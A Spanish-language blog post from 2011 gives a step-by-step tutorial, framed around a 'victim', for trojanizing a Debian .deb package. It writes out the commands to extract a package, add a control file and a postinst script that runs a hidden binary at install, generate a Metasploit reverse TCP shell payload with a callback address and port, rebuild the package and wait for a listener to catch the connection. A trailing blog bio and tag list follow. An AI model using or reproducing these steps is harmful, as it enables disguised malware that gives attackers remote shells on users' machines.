18 nov. 2011

[Video Metasploit] Troyanizando un paquete *.deb

Quiero postear este video que lo encontré bastante interesante y útil ya que una de las formas más faciles de acceder a un sistema es simplemente enviando un archivo infectado con cualquier tipo de malware (Troyano, keylogger, backdoor, etc...) a nuestra victima y que mejor forma para infectar un Linux que hacerle creer a la víctima que está instalando un simple paquete *.deb con un regalito dentro, a continuación el video y la explicación:

* Bajar el paquete a infectar:
apt-get --download-only install pakete

* Moverlo donde trabajaremos:
mv /var/cache/apt/archives/pakete /area/de/trabajo

* Extraerlo:
dpkg -x pakete work

* Crear la carpeta que nos ayudará para el payload de infección:
mkdir work/DEBIAN

* En el directorio "DEBIAN", crear un archivo llamado "control" que tenga lo siguiente (se modifica según necesidad):
Package: pakete
Version: 1000000000
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MATU Developers ([email protected])
Description: game

* También hay que crear el script de post-instalación que ejecutará nuestro binario. En "DEBIAN" creamos el archivo llamado "postinst" que contiene los siguiente:
#!/bin/sh
sudo chmod 2755 /usr/games/pakete_scores && /usr/games/pakete_scores & /usr/games/pakete &

* Cambiamos permisos a postinst:
chmod a+x postinst

* Ahora vamos a crear nuestro payload malicioso. Creamos una shell inversa para que se conecte de nuevo a nosotros llamada "pakete_scores".
./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=4444 X > /area/de/trabajo/work/usr/games/pakete_scores

* Hacer el payload ejecutable, el archivo de construcción será llamado ".deb", lo cambiamos a pakete.deb:
dpkg-deb --build /area/de/trabajo/work

* Por último con msfconsole y con multi/handler seleccionamos el payload con el que infectaremos, más los parametros de LHOST y LPORT y esperamos a que la víctima lo instale.

Source: http://zerialkiller.blogspot.com/

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.